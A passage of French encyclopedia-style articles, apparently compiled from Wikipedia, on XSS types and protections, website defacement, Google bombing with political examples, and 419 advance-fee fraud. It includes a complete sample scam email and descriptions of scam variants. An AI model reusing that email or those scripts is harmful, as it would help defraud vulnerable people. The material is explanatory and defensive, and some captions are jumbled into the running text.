XSS réfléchi (ou non-permanent) Ce type de faille de sécurité, qui peut être qualifié de « non-permanent », est de loin le plus commun. Il apparaît lorsque des données fournies par un client web sont utilisées telles quelles par les scripts du serveur pour produire une page de résultats. Si les données non vérifiées sont incluses dans la page de résultat sans encodage des entités HTML, elles pourront être utilisées pour injecter du code dans la page dynamique reçue par le navigateur client. Un exemple classique dans les moteurs de recherche des sites : si l'on recherche une chaîne qui contient des caractères spéciaux HTML, souvent la chaîne recherchée sera affichée sur la page de résultat pour rappeler ce qui était cherché, ou dans une boîte de texte pour la réédition de cette chaîne. Si la chaîne affichée n'est pas encodée, il y a une faille XSS. À première vue, ce n'est pas un problème grave parce que l'utilisateur peut seulement injecter du code dans ses propres pages. Cependant, avec un peu d'ingénierie sociale, un attaquant peut convaincre un utilisateur de suivre une URL piégée qui injecte du code dans la page de résultat, ce qui donne à l'attaquant tout contrôle sur le contenu de cette page. L'ingénierie sociale étant requise pour l'exploitation de ce type de faille (et du précédent), beaucoup de programmeurs ont considéré que ces trous n'étaient pas très importants. Cette erreur est souvent généralisée aux failles XSS en général.

XSS stocké (ou permanent) Ce type de vulnérabilité, aussi appelé faille permanente ou du second ordre permet des attaques puissantes. Elle se produit quand les données fournies par un utilisateur sont stockées sur un serveur (dans une base de données, des fichiers, ou autre), et ensuite réaffichées sans que les caractères spéciaux HTML aient été encodés. Un exemple classique est celui des forums, où les utilisateurs peuvent poster des textes formatés avec des balises HTML. Ces failles sont plus importantes que celles d'autres types, parce qu'un attaquant peut se contenter d'injecter un script une seule fois et atteindre un grand nombre de victimes sans recourir à l'ingénierie sociale. Il y a diverses méthodes d'injection, qui ne nécessitent pas forcément que l'attaquant utilise l'application web elle-même. Toutes les données reçues par l'application web (par email, journaux, etc.) qui peuvent être envoyées par un attaquant doivent être encodées avant leur présentation sur une page dynamique, faute de quoi une faille XSS existe. Cross-site scripting 92

Basé sur le DOM ou local Ce type de faille XSS est connu de longue date. Un article écrit en 2005[5] définit bien ses caractéristiques. Dans ce cas de figure, le problème est dans le script d'une page côté client. Par exemple, si un fragment de JavaScript accède à un paramètre d'une requête d'URL, et utilise cette information pour écrire du HTML dans sa propre page, et que cette information n'est pas encodée sous forme d'entités HTML, alors il y a probablement une vulnérabilité de type XSS. Les données écrites seront réinterprétées par le navigateur comme du code HTML contenant éventuellement un script malicieux ajouté. En pratique la manière d'exploiter une telle faille sera similaire au type suivant, sauf dans une situation très importante. À cause de la manière dont Internet Explorer traite les scripts côté client dans des objets situés dans la « zone locale » (par exemple le disque dur local du client), une faille de ce type peut conduire à des vulnérabilités d'exécution à distance. Par exemple, si un attaquant héberge un site web « malicieux » contenant un lien vers une page vulnérable sur le système local du client, un script peut être injecté et tournera avec les droits du navigateur web de l'utilisateur sur ce système. Ceci contourne complètement le « bac à sable », pas seulement les restrictions inter-domaines qui sont normalement contournées par les XSS.

Protection contre les XSS Plusieurs techniques permettent d'éviter le XSS : • Retraiter systématiquement le code HTML produit par l'application avant l'envoi au navigateur ; • Filtrer les variables affichées ou enregistrées avec des caractères '<' et '>' (en CGI comme en PHP). De façon plus générale, donner des noms préfixés par exemple par "us" (user string) aux variables contenant des chaînes venant de l'extérieur pour les distinguer des autres, et ne jamais utiliser aucune des valeurs correspondantes dans une chaîne exécutable (en particulier une chaine SQL, qui peut aussi être ciblée par une injection SQL d'autant plus dangereuse) sans filtrage préalable. • En PHP : • utiliser la fonction htmlspecialchars() qui filtre les '<' et '>' (cf. ci-dessus) ; • utiliser la fonction htmlentities() qui est identique à htmlspecialchars() sauf qu'elle filtre tous les caractères équivalents au codage HTML ou JavaScript. • utiliser strip_tags() qui supprime les balises. • En ColdFusion : • utiliser la fonction HTMLEditFormat() qui remplace tous les caractères spéciaux du langage HTML par leur référence d'entité • définir l'attribut scriptProtect du tag pour protéger automatiquement toutes les variables (form et/ou url et/ou cgi et/ou cookies) d'un site •• activer au niveau du serveur une protection globale (form, url, cgi et cookies) par défaut de toutes les applications en cochant la case "Enable Global Script Protection" du ColdFusion Administrator • Utiliser de façon propre les balises HTML , ce qui est insuffisant[6]. Il existe des bibliothèques qui permettent de filtrer efficacement du contenu balisé issu de l'utilisateur (systèmes de publication). Par ailleurs, il est également possible de se protéger des failles de type XSS à l'aide d'équipements réseaux dédiés tels que les pare-feux applicatifs. Ces derniers permettent de filtrer l'ensemble des flux HTTP afin de détecter les requêtes suspectes. Cross-site scripting 93

Utilisation de XSS dans des attaques Plusieurs attaques importantes ont utilisé des failles de type Cross-site scripting : • Une faille de ce type était à l'origine de la propagation des virus Samy sur MySpace en 2005[7] et Yamanner sur Yahoo! Mail en 2006. • En 2010, le site apache.org a été compromis à l'aide d'une XSS[8]

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Cross-site_scripting& action=edit

[3] http:/ / httpd. apache. org/ info/ css-security/

[4] http:/ / httpd. apache. org/

[5] DOM-Based cross-site scripting (http:/ / www. webappsec. org/ projects/ articles/ 071105. shtml)

[6] http:/ / securethoughts. com/ 2009/ 02/ hacking-for-xss-inside-noscript-html-tags/ : exploiter une faille XSS à l'intérieur de balises noscript

[7] http:/ / namb. la/ popular/ tech. html : explication et source du ver

Défacement

Un défacement, défaçage ou défiguration (defacing en anglais) est un anglicisme désignant la modification non sollicitée de la présentation d'un site web, à la suite du piratage de ce site. Il s'agit donc d'une forme de détournement de site Web par un hacker.

Origine Les défacements sont provoqués par l'utilisation de failles présentes sur une page Web ou tout simplement une faille du système d'exploitation du serveur Web. La plupart du temps, les sites défacés le sont uniquement sur la page d'accueil. Le défacement n'entraîne pas en soi de perte de données.

Caractéristiques d'un défacement Une page défacée peut contenir plusieurs éléments : •• un fond uni, qui peut être le seul indice de défacement d'un site ; la plupart du temps la page d'accueil est blanche ou noire • un simple mot, comme owned, hacked ou bien le pseudonyme du défaceur • une image est assez souvent présente, et affiche les revendications du défaceur. On trouve souvent des symboles se référant à la mort (crânes…), un drapeau sous lequel le défaceur est fier d'agir, etc. • parfois plus qu'un simple mot, plusieurs phrases, pouvant être de différentes natures (insultes envers des états, des défaceurs adverses ; une revendication spécifique…) • une explication simple de la façon dont le défaceur a acquis l'accès en écriture sur le site, accompagnée à l'occasion d'une moquerie envers le webmestre ou l'administrateur du site en question •• plus rarement un fichier audio. Défacement 94

Les défaceurs Les compétences d'un défaceur peuvent être évaluées selon plusieurs facteurs. • Le premier est celui de la plate-forme à laquelle celui-ci s'est attaqué. Par exemple, un défaceur ne s'attaquant qu'à des machines sous Windows, vulnérables car non patchées, ne fait qu'exploiter des failles logicielles et ne pourra pas mettre sa technique en pratique sur d'autres plates-formes. La diversité de plates-formes auxquelles s'attaque le défaceur constitue donc sa capacité à s'infiltrer sur un plus ou moins vaste champ de machines. •• Le deuxième élément est celui du nombre de machines portant sa marque. Plus le nombre de sites défacés est important, plus le hacker a démontré que chaque cible n'était qu'une formalité dont il s'est vite débarrassé pour passer à autre chose. •• Le troisième indice est constitué par la manière dont le hacker a réussi à gagner l'accès en écriture sur le domaine visé. Certaines vulnérabilités logicielles étant courantes sur des machines non patchées (principalement sous Windows), le défaceur ne retirera que peu de prestige de cet acte. Au contraire, s'il infiltre une machine sous Linux grâce à un ensemble de moyens peu courants et nécessitant une longue préparation, il en tirera beaucoup plus de reconnaissance. •• Mais d'autres facteurs interviennent également : un défacement comportant insultes, images « crues » ou incitant à la haine envers un état ou une organisation ne sera vu que comme activisme politiquement orienté. De même pour un défacement ayant pour but premier le vol de données ou le vandalisme de la base de données. Au contraire, un défaceur expliquant sans insultes les motivations de son acte, en précisant au webmestre comment il l'a « doublé » et comment corriger cette faille à l'avenir, de plus sans vandalisme excessif, sera beaucoup plus reconnu.

Étymologie Le mot anglais, qui provient de l'ancien français « desfacer », peut être rendu par « dégradation » ou « vandalisme ». 95

2.6-Spam/Fishing

Bombardement Google

Le bombardement Google (anglais : Google bombing) (ou bombardement de Google) est une technique de référencement visant à influencer le classement d'une page dans les résultats du moteur de recherche Google. Elle exploite une caractéristique de l'algorithme PageRank qui accorde un certain poids au texte ayant un hyperlien vers une page.

Mode opératoire Si plusieurs sites utilisent le même texte pour pointer sur la même cible, Google additionne ce poids et il devient possible de faire apparaître la page cible dans les résultats d'une recherche sur le texte contenu dans les liens pointant vers elle. Par exemple, si une personne enregistre de nombreux noms de domaine, puis les fait pointer vers un même site en utilisant le même texte : « ... est une légende vivante », toutes les personnes recherchant le texte « légende vivante » verront le site visé, même si ce texte n'y apparaît pas. Ce comportement du moteur Google a été exploité principalement au sein des réseaux informels d'auteurs de blogs pour agir collectivement sur le classement d'un site. Selon des résultats empiriques, une poignée de blogs seulement serait nécessaire pour réaliser un bombardement Google. Son efficacité augmente avec le nombre croissant de sites qui publient ou dissimulent l'expression à détourner. Ce phénomène ne relève ni du piratage ni d'une quelconque faille, il exploite la manière dont Google organise les résultats de recherche sur ses pages. La technique a été la première fois détaillée le 6 avril 2001 dans un article d'Adam Mathes[1] (L'expression « Google bombing » a été introduite dans le New Oxford American Dictionary en mai 2005), puis utilisée à maintes reprises à des fins ludiques, politiques et économiques par des internautes. Mais certains utilisateurs voyaient dans ces bombardements l'opinion personnelle de la société ou d'un de ses employés. C'est pourquoi, le 25 janvier 2007[2], la société a mis en place un nouvel algorithme pour limiter cette pratique qui prenait de l'ampleur. Quand il détecte un bombardement, celui-ci propose des liens ayant un rapport avec cette technique plutôt que le site original. Si l'algorithme fonctionne pour les exemples les plus célèbres, certains mots-clés renvoient toujours aux pages humoristiquement ciblées. Bien que nommée ainsi, la technique de bombardement Google est également observable sur d'autres moteurs de recherche tels que Yahoo! et Live Search. Les meilleurs résultats sont obtenus en employant le bouton « J'ai de la chance » de l'interface du moteur Google qui oriente automatiquement l'utilisateur vers le premier résultat. Google avait par ailleurs fait savoir dans un communiqué de presse datant du 22 juillet 2009 qu'il n'était pas responsable de ces erreurs. Selon ses porte-parole, il ne semble pas évident pour Google de parvenir à désamorcer cette technique sans pour autant compromettre le fonctionnement automatique et « impartial » de son moteur[3],[4]. Bombardement Google 96

Exemples actuels • Trouver Chuck Norris [5] En recherchant sur Google Trouver Chuck Norris avec l'outil « J'ai de la chance », Google renvoie un résultat [6] qui est une page identique à une page de résultat Google, qui indique que Google ne peut pas trouver Chuck Norris car c'est lui qui vous trouvera. Cette page n'a cependant aucun lien avec Google, elle a été créée par Kyro. • Site très moche [7] En recherchant "site très moche" le moteur de recherche amène à la plate forme de diffusion de cours de l'université Lyon1 Spiral Connect [8]

Exemples déchus • Incapable de gouverner [9] En recherchant « Incapable de gouverner » le moteur de recherche amène au site de campagne de François Hollande [10]. • On va tuer la France [11] En recherchant « On va tuer la France » le moteur de recherche amène au site de l'UMP [12]. • French military victories [13] (« victoires militaires françaises ») renvoyait à une fausse page d'erreur [14] ressemblant en tout point à celle renvoyée par Google en cas d'absence de réponses. Ce bombardement Google a été initié par les partisans du gouvernement de George Bush à la suite de la menace de veto français au Conseil de sécurité des Nations unies de l'avant-guerre en Irak de 2003. La page d'erreur suggère de rechercher french military defeats (ce lien pointant vers une liste des défaites militaires françaises). • Trou du cul [15] renvoyait à la page Facebook officielle de Nicolas Sarkozy [16] [17]. • worst failure ever [18] (« le pire fiasco de tous les temps ») avait pour premier résultat le site officiel de la Maison-Blanche. • Programme Ségolène [19] (sous-entendu, le programme électoral de la candidate à l'élection présidentielle de 2007 en France Ségolène Royal) renvoyait en second résultat l'article Vide de Wikipédia. • Nouveau Centre [20] : Le nom de ce parti renvoyait, en quatrième réponse, un lien sur la page wikipédia de Judas, en référence à la dissidence du Nouveau Centre par rapport à François Bayrou, souvent interprétée par ses détracteurs comme une traîtrise. • weapons of mass destruction [21] (armes de destruction massive) renvoyait une page d'erreur typique [22] de domaine (du navigateur Internet Explorer) critiquant les raisons d'entrée en guerre des États-Unis contre l'Irak en 2003. • miserable failure [23] (« échec lamentable ») renvoyait en première place à la biographie officielle de George W. Bush, en seconde place à Jimmy Carter et en troisième place à Michael Moore (fin 2008, cette recherche mène à des articles consacrés au bombardement même). Tandis que great president [24] renvoyait à une fausse biographie de George W. Bush. • waffles [25] (gaufre) renvoyait au site de John Kerry. • litigious bastards [26] (« connards procéduriers ») est une fausse page d'accueil de la société SCO initiée par la communauté GNU/Linux. • magouilleur [27] renvoyait à la page du président Jacques Chirac. • gros balourd [28] renvoyait à une brève biographie de Jean-Pierre Raffarin, premier ministre du gouvernement français en 2004[29]. • député liberticide [30] conduisait au site web de Jean Dionis du Séjour, député français de Lot-et-Garonne, impliqué dans le débat sur la loi sur l'économie numérique. • insignifiant [31] et mouton insignifiant [32] renvoyaient vers la biographie de Jean Charest, Premier ministre du Québec. • Ministre blanchisseur [33] renvoyait à une page de RTL du 16 février 2004 faisant état de la condamnation à 15 000 euros d'amende de Renaud Donnedieu de Vabres pour blanchiment d'argent. Bombardement Google 97

• Nicolas Sarkozy [34] renvoyait au site officiel du film Iznogoud de Patrick Braoudé. Ce renvoi faisait référence aux ambitions présidentielles de l'ancien ministre de l'Intérieur. Le bombardement avait été lancé en réponse à une campagne de promotion du projet de cette personnalité par courrier électronique, dans des conditions controversées. La recherche inverse sur Iznogoud [35] renvoyait quant à elle à la biographie officielle de Nicolas Sarkozy[29]. • le site officiel [36] de Christy Walton.com menait à un article en vente sur Amazon.com "AntiChrist cx: The First Journal" de Michael Kappel. • Le lobby Microsoft [37] renvoyait à la fiche senat.fr [38] de Michel Thiollière, rapporteur au sénat du projet DADVSI. • vizirette [39] renvoyait à la page de Rachida Dati sur le site du premier ministre[40]. • inadmissible incompétence [41], pointait le site officiel du catalogue 3 Suisses[42] Ce bombardement est l'œuvre d'un petit groupe de bloggeurs ayant commandé un téléviseur avec une réduction de 90 % et qui ont par la suite été informés par la direction des 3 Suisses que c'était une erreur. • fils à papa [43] renvoyait en premier résultat le site Web de Jean Sarkozy. Ce bombardement Google faisait allusion à la controverse suscitée par la possible élection de Jean Sarkozy à la présidence de l'Epad[44]. • trou du cul du web [45][46] renvoyait au site vitrine de Nicolas Sarkozy, ceci semble être une allusion au fait que ce dernier souhaite le vote[47] d'une loi sur le téléchargement illégal : la loi Hadopi. • vatican [48][49] renvoyait en premier résultat sur la version italienne de Google un site pédophile dont la page d'accueil arborait le même titre que le site officiel du Vatican. • Cheffara Maroc [50] En recherchant sur Google Cheffara Maroc (Voleurs Maroc) avec l'outil « J'ai de la chance », Google renvoie un résultat [51] qui est la page de l'opérateur historique du Maroc à savoir: Maroc Telecom[52]. • le mexicain [53] En recherchant sur Google le mexicain avec l'outil « J'ai de la chance », Google renvoie un résultat [53] qui est la page d'un site dont le sujet était l'ambre et utilisait les recherches d'étudiant. Ce bombardement est l'œuvre d'un groupe d'étudiant mécontent que leurs recherches soient plagiés. • Taper « trisomique » sur Google recherche d'images faisait apparaître en première position, en 2011, une photo du Président de la République française Nicolas Sarkozy.

Notes et références

[1] Article Google Bombing d'Adam Mathes (http:/ / uber. nu/ 2001/ 04/ 06/ ), consulté le 15 juin 2009. [2][2].

[3] Réaction de Google après le Google Bombing de Sarkozy (http:/ / un-site. blogspot. com/ 2010/ 01/ google-prend-sarko-pour-un-trou-du-cul. html) consulté le 14 janvier 2010 [4][4].

[5] http:/ / www. google. com/ search?q=Trouver+ Chuck+ Norris& btnI

[6] http:/ / infomars. fr/ chuck

[7] http:/ / www. google. fr/ search?& q=site+ très+ moche

[8] http:/ / spiralconnect. univ-lyon1. fr/

[9] http:/ / www. google. fr/ #hl=fr& gs_nf=1& cp=9& gs_id=53& xhr=t& q=incapable+ de+ gouverner& pq=incapable+ de+ gouverner&

pf=p& sclient=psy-ab& source=hp& pbx=1& oq=incapable& aq=0z& aqi=g-z1g3& aql=& gs_sm=& gs_upl=& bav=on. 2,or. r_gc. r_pw. ,cf.

osb& fp=5de06da78f41c041& biw=944& bih=951

[10] Incapable de gouverner : François Hollande victime d'un Google Bombing (http:/ / actu. abondance. com/ 2012/ 02/

incapable-de-gouverner-francois. html), article d'Olivier Andrieu, consulté le 18 février 2012.

[11] http:/ / www. google. fr/ search?& q=on+ va+ tuer+ la+ france

[12] (http:/ / www. rue89. com/ 2012/ 02/ 20/ victime-dun-google-bombing-lump-va-tuer-la-france-229556) "On va tuer la France" article d'Augustin Scalbert sur Rue 89.

[13] http:/ / www. google. com/ search?q=french+ military+ victories

[14] http:/ / www. albinoblacksheep. com/ text/ victories. html

[15] http:/ / www. google. fr/ search?q=trou+ du+ cul

[16] http:/ / www. facebook. com/ nicolassarkozy

[17] Sarkozy encore victime d'un Google Bombing (http:/ / actu. abondance. com/ 2010/ 09/ sarkozy-encore-victime-dun-google. html), article d'Olivier Andrieu, consulté le 7 septembre 2010.

[18] http:/ / www. google. com/ search?q=worst+ failure+ ever Bombardement Google 98

[19] http:/ / www. google. fr/ search?q=programme+ S%C3%A9gol%C3%A8ne&

[20] http:/ / www. google. fr/ search?num=100& hl=fr& safe=off& q=nouveau+ centre& btnG=Rechercher& meta=

[21] http:/ / www. google. com/ search?q=weapons+ of+ mass+ destruction

[22] http:/ / www. coxar. pwp. blueyonder. co. uk/

[23] http:/ / www. google. com/ search?q=miserable+ failure

[24] http:/ / www. google. com/ search?q=great+ president

[25] http:/ / www. google. com/ search?hl=en& lr=& q=waffles

[26] http:/ / www. google. com/ search?q=litigious+ bastards

[27] http:/ / www. google. com/ search?hl=en& lr=& q=magouilleur

[28] http:/ / www. google. com/ search?q=%22gros+ balourd%22& ie=UTF-8& oe=UTF-8& hl=fr& btnG=Recherche+ Google& meta=

[29] Billet sur la fin de ce 2 bombardements (http:/ / blog. dreamnev. com/ Fin-de-Gros-Balourd-et-d-Iznogoud), consulté le 15 juin 2009.

[30] http:/ / www. google. fr/ search?hl=fr& ie=UTF-8& oe=UTF-8& q=%22d%C3%A9put%C3%A9+ liberticide%22& btnG=Rechercher& meta=

[31] http:/ / www. google. ca/ search?hl=fr& q=insignifiant& meta=

[32] http:/ / www. google. com/ search?hl=fr& & q=mouton+ insignifiant& btnG=Rechercher& meta=

[33] http:/ / www. google. com/ search?q=ministre+ blanchisseur& start=0& ie=utf-8& oe=utf-8& client=firefox-a& rls=org. mozilla:fr:official

[34] http:/ / www. google. fr/ search?hl=fr& q=nicolas+ sarkozy& meta=

[35] http:/ / www. google. fr/ search?q=Iznogoud& sourceid=mozilla-search& start=0& start=0& ie=utf-8& oe=utf-8& client=firefox-a&

rls=org. mozilla:fr:official

[36] http:/ / www. google. fr/ search?sourceid=navclient-ff& ie=UTF-8& rls=GGGL,GGGL:2006-35,GGGL:fr& q=christy+ walton

[37] http:/ / www. google. fr/ search?q=le+ lobby+ microsoft

[38] http:/ / www. senat. fr/ senfic/ thiolliere_michel01039u. html

[39] http:/ / www. google. fr/ search?hl=fr& q=vizirette& meta=

[40] Article "Vizirette à la place du Vizir" de Benjamin Lemaire (http:/ / www. benjamin-lemaire. info/ blog/ 2008/ 08/ 20/ actualite/ politique/

vizirette-a-la-place-du-vizir/ ), consulté le 15 juin 2009.

[41] http:/ / www. google. com/ search?q=inadmissible+ incompétence& btnI

[42] 3 suisses (http:/ / www. 3suisses. fr/ ).

[43] http:/ / www. google. fr/ search?rls=fr& q=fils+ a+ papa& ie=utf-8& oe=utf-8

[44] Google bombing pour Jean Sarkozy (http:/ / actu. abondance. com/ 2009/ 10/ google-bombing-pour-jean-sarkozy. html), article d'Olivier Andrieu, consulté le 20 octobre 2009

[45] http:/ / www. google. com/ search?q=trou+ du+ cul+ du+ web

[46] Trou de cul du Web : nouveau Google Bombing contre Nicolas Sarkozy (http:/ / actu. abondance. com/ 2009/ 07/

trou-du-cul-du-web-nouveau-google. html), article d'Olivier Andrieu, consulté le 24 juillet 2009

[47] Hadopi : Sarkozy ira jusqu'au bout (http:/ / www. lefigaro. fr/ flash-actu/ 2009/ 06/ 22/

01011-20090622FILWWW00472-hadopi-sarkozy-ira-jusqu-au-bout. php), extrait du Figaro.fr consulté le 24 juillet 2009.

[48] http:/ / www. google. com/ search?q=vatican

[49] Le Vatican victime d'un Google Bombing ? (http:/ / actu. abondance. com/ 2010/ 07/ le-vatican-victime-dun-google-bombing. html), article d'Olivier Andrieu, consulté le 19 juillet 2010.

[50] http:/ / www. google. com/ search?q=Cheffara+ Maroc

[51] http:/ / www. iam. ma/

[52] Qui sont les Cheffara Maroc (Voleurs Maroc) ? demandez à google :-) (http:/ / www. meilleurs-trucs-et-astuces. com/ 2010/ 09/ 09/

quels-sont-les-cheffara-maroc-voleurs-maroc-demandez-a-google/ ), article de Abdelali EL OUAZZANI, consulté le 9 septembre 2010

[53] http:/ / www. mexican-amber. com/ Fraude 4-1-9 99 Fraude 4-1-9

La fraude 419 (aussi appelée scam 419, ou arnaque nigériane) est une escroquerie répandue sur Internet. La dénomination 4-1-9 vient du numéro de l'article du code nigérian sanctionnant ce type de fraude.

Présentation

Cette escroquerie abuse de la crédulité des victimes en utilisant les messageries électroniques (courriels principalement) pour leur soutirer de l'argent. Les premières escroqueries de ce type sont apparues comme des escroqueries sous la forme de livraison postale. Un scam se présente généralement sous la forme d'un spam dans lequel une personne affirme posséder une importante somme d'argent (plusieurs millions de dollars en héritage, pots-de-vin, comptes tombés en déshérence, fonds à placer à l'étranger à la suite d'un changement de Exemple de scam nigérian expédié par courrier contexte politique, etc.) et fait part de son besoin d'utiliser un compte postal en 1995 existant pour transférer rapidement cet argent.

La personne à l'origine du scam demande de l'aide pour effectuer ce transfert d'argent, en échange de quoi il offre un pourcentage sur la somme qui sera transférée, en général par la « voie diplomatique ». Si la victime accepte, on lui demandera petit à petit d’avancer des sommes d’argent destinées à couvrir des frais imaginaires (notaires, entreprises de sécurité, pots-de-vin…) avant que le transfert ne soit effectif ; bien entendu, ce transfert n’aura jamais lieu. En 2002, le Secret service, service du Département du Trésor des États-Unis, estime que ce type d'escroquerie rapporte plusieurs centaines de millions de dollars US par an à ses auteurs et cela en constante augmentation[1]. Des affaires jugées en 2010 ont montré une moyenne de 20 000 $ US extorqués par victime[2].

Variantes

• LOTERIE. — L'escroc prétend s’exprimer au nom d'un organisme gérant des jeux de loterie. Il annonce à la victime potentielle qu'elle a été tirée au sort, a gagné une grosse somme d'argent et doit contacter certaines personnes pour recevoir son prix. La procédure pour récupérer le prix nécessite le paiement de divers frais de

gestion. On reconnaît ces arnaques au fait qu'elles sont Exemple de mail frauduleux racontant de manière généralement truffées de fautes de français. peu plausible une histoire d'héritage.

• OFFRE D'EMPLOI. — Une personne ou entreprise, prétend offrir un emploi en Afrique (Nigeria). Cette offre d'emploi n'existe pas, mais la victime est sollicitée pour verser de l'argent pour le permis de travail ou le voyage. • OFFRE D'EMPLOI (2). — Une offre propose du travail à de (jeunes) traducteurs indépendants contre une rémunération intéressante.[3] Si le naïf accepte, on lui propose de le payer d'avance et on lui envoie un chèque (évidemment faux) qu'il transmet à sa banque. Les escrocs savent que celle-ci mettra un certain temps à traiter le chèque et à découvrir qu'il ne vaut rien. Peu de temps après, le traducteur reçoit l'avis que, pour une raison quelconque, la commande est annulée et on demande le remboursement de la somme versée. Le malheureux s'exécute et son chèque est aussitôt encaissé, alors le chèque reçu et déposé ne vaut rien. Fraude 4-1-9 100

• VOITURE, MATÉRIEL HIGH-TECH. — Sur un site de petites annonces, un article (généralement un véhicule, ou encore des lots de matériel high-tech) est proposé à un prix défiant toute concurrence, voire gratuit. Le vendeur demande juste de payer les frais de port, par Western-Union! L'article n'existe pas et la victime perd bien entendu l'argent versé. • ŒUVRE D'ART. — Sur un site de petites annonces, un tableau ou une oeuvre d'art est proposée au prix du marché. Généralement, le descriptif est copié-collé d'une notice issue d'une vente précédente. Le tableau n'existe pas ou n'est pas à vendre, mais l'escroc demande des versements préalables à la vente, urgente comme de bien entendu. • AMOUR. — Sur un site de rencontres (selon le principe de « la prisonnière espagnole »), une femme séduisante dialogue quelque temps et finit par demander de l'argent pour diverses raisons (venir vous voir, un problème d'argent pendant un voyage lointain (Afrique), paiement d'une agence de traduction (Europe de l'Est)). L'arnaqueuse donnant réellement l'impression d'être amoureuse, l'escroquerie devient facile. • AMOUR (2). — Un piège aux femmes seules inscrites sur des sites de rencontres. Un homme se présente bien, photo à l'appui, bonne profession, passé douloureux, ayant un lien avec l'Afrique soit professionnel, soit associatif. Très amoureux, il promet rapidement le mariage. Il vous contacte un jour, d'Afrique où sa fille est hospitalisée, où il a commis un accident de la route et blessé une jeune fille. Bien sûr, il a de gros besoins financiers, il demande une forte somme et jure sur l'honneur de la rendre au centuple, etc. De tels agissements sont connus des services de police.

Origine Les pourriels dits scam proviennent surtout d'Afrique, mais aussi de différents pays d'Europe, de Russie (Zelenodolsk) et d'Asie.[réf. nécessaire] En France, le tribunal de grande instance de la Roche-sur-Yon a prononcé, le 24 septembre 2007, des condamnations de cinq et trois ans de prison ferme, à l'encontre de personnes jugées pour escroquerie en bande organisée[4], qui opéraient sur le territoire français.

Exemple Voici un exemple de courriel destiné à lancer une fraude 4-1-9 : De: Fred Kone Tel:***-******** Courriel:****@yahoo.com Bonjour, Je m'appelle Fred Kone je suis âgé de 26 ans et je vis en Côte d'Ivoire. Malheureusement comme vous le savez mon pays traverse une période très difficile ce qui m'a contraint à fuir ma région d'habitation qui est Bouaké (dans le centre du pays). Mon père était un marchand de cacao très riche à Abidjan, la capitale économique de la Côte d'Ivoire. Avant qu'il n'ait été grièvement blessé par les rebelles, urgemment conduit à l'hôpital il m'a fait savoir qu'il avait déposé 5 000 000 $ dans une mallette dans une société de sécurité basée à Abidjan. À l'annonce de la mort de mon père je me suis précipité dans sa chambre dans le but de prendre tout ce qu'il avait comme document administratif, j'ai découvert le certificat de dépôt délivré par la compagnie de sécurité à mon père. Une fois arrivé à Abidjan j'ai essayé de vérifier la validité de ce document. Le directeur de la société m'a confirmé l'existence de cette mallette dans leur établissement. De peur de perdre cet argent, je sollicite l'aide de quelqu'un afin de transférer ce seul bien que mon père m'a légué dans un pays Fraude 4-1-9 101

étranger pour investir car la situation en Côte d'Ivoire est toujours incertaine. Une fois le transfert effectué je me rendrai là-bas pour récupérer cet argent et y faire ma vie. Si vous êtes prêt à m'aider, envoyez-moi vite une réponse afin que l'on puisse trouver un conciliabule. Dans l'attente d'une suite favorable recevez mes salutations et que dieu vous bénisse. PS: N'oubliez pas de me contacter directement à mon adresse privée:****@yahoo.com Fred Kone. Il existe plusieurs centaines de variantes de ce spam.

Morts violentes La fraude 4-1-9 a été à l’origine de plusieurs morts violentes : • en juin 1995, un Américain a ainsi été assassiné à Lagos, au Nigeria, après avoir tenté de récupérer son argent[5] ; • en février 2003, un Tchèque a tué par balle un diplomate nigérian qu'il prenait pour un responsable de l'escroquerie[6] ; • en janvier 2004, un Britannique s'est suicidé à la suite d'une dépression provoquée par une escroquerie par scam[7] ; • en décembre 2004, un Grec, victime de scam, a été enlevé à Durban en Afrique du Sud. Une rançon a été demandée mais n'a pas été payée. Il a été mutilé puis assassiné[8].

Origine du terme La dénomination 419 vient du numéro de l'article du code nigérian sanctionnant ce type de fraude. L'origine des escroqueries par courrier est antérieure à l'adoption généralisée de l'Internet. Le premier cas occidental d’escroquerie de ce type remonte à la Révolution française : il s’agit des lettres de Jérusalem. Dès la seconde moitié du XXe siècle, des Nigérians se sont inspirés des études du siècle précédent sur les premiers réseaux d'envoi massif de courriers postaux à vocation frauduleuse. Le phénomène nigérian, à propagation rapide, fut rapidement identifié et dénoncé par les services d'État anglais et américains, ce qui a mené à sa pénalisation au Nigeria.[réf. nécessaire] Internet a produit une véritable explosion de l'arnaque (à la fois en quantité et en efficacité). On observe depuis des variantes qui ne sont pas seulement limitées à l'Afrique et il semble confirmé que des escrocs de tous pays se cachent derrière ces identités inventées.

Scambaiters Certains internautes se sont spécialisés dans la lutte contre ces arnaques, et notamment le scam africain. On les dénomme « croque-escrocs » ou « scambaiters » ((en) scam étant « fraude » et bait « appât »)[9]. Leur objectif est d'occuper et de faire perdre du temps et de l'argent à ces escrocs, qui se connectent en général depuis des cyber-cafés, et qui paient donc leurs connexions. Il y aurait actuellement des croque-escrocs dans pratiquement tous les pays du monde[10]. Fraude 4-1-9 102

Références

[3] www.paymentpractices.net/Scams.aspx (http:/ / www. paymentpractices. net/ Scams. aspx)

[4] La décision du 24 septembre 2007 (http:/ / www. legalis. net/ jurisprudence-decision. php3?id_article=2060)

[9] Le Tigre, volume III (juin 2007), Arnaque à la nigériane (http:/ / www. le-tigre. net/ Escrocs-et-croque-escrocs-sur. html)

[10] Le Tigre, volume III (juin 2007), Mes amis les cyber-arnaqueurs (http:/ / www. le-tigre. net/ Entretien-Mes-amis-les-cyber. html)

Bibliographie • (en) Hennig Wagenbreth (illustration), Cry for Help: 36 Scam E-Mails from Africa, Gingko Press, 2006 (ISBN 9781584232452)

Liens externes

• Association des Victimes d'Escroqueries à la Nigériane (http:/ / www. avenfrance. org)

• Catégorie Advance Fee Fraud (http:/ / www. dmoz. org/ Society/ Issues/ Fraud/ Advance_Fee_Fraud/ ) de l’annuaire dmoz

• (en) Washington Post (http:/ / www. washingtonpost. com/ wp-dyn/ content/ article/ 2009/ 08/ 06/

AR2009080603764. html) - Enquête et entretien de scammeurs nigérians.

• J'ai testé pour vous : l'arnaque sur Internet (http:/ / www. clubic. com/ antivirus-securite-informatique/

virus-hacker-piratage/ cybercriminalite/ article-477634-1-teste-arnaque-internet. html) - Une fraude suivie et décryptée par une journaliste (2012).

• Pourquoi les spammeurs viennent tous du Nigéria ? (http:/ / www. slate. fr/ lien/ 58199/ spam-nigeria) (Slate.fr, 2012)

• Portail de la sécurité informatique Hameçonnage

